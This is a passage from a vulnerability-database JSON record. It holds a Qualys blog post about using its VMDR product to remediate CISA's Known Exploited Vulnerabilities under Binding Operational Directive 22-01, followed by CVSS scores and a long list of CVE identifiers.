`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}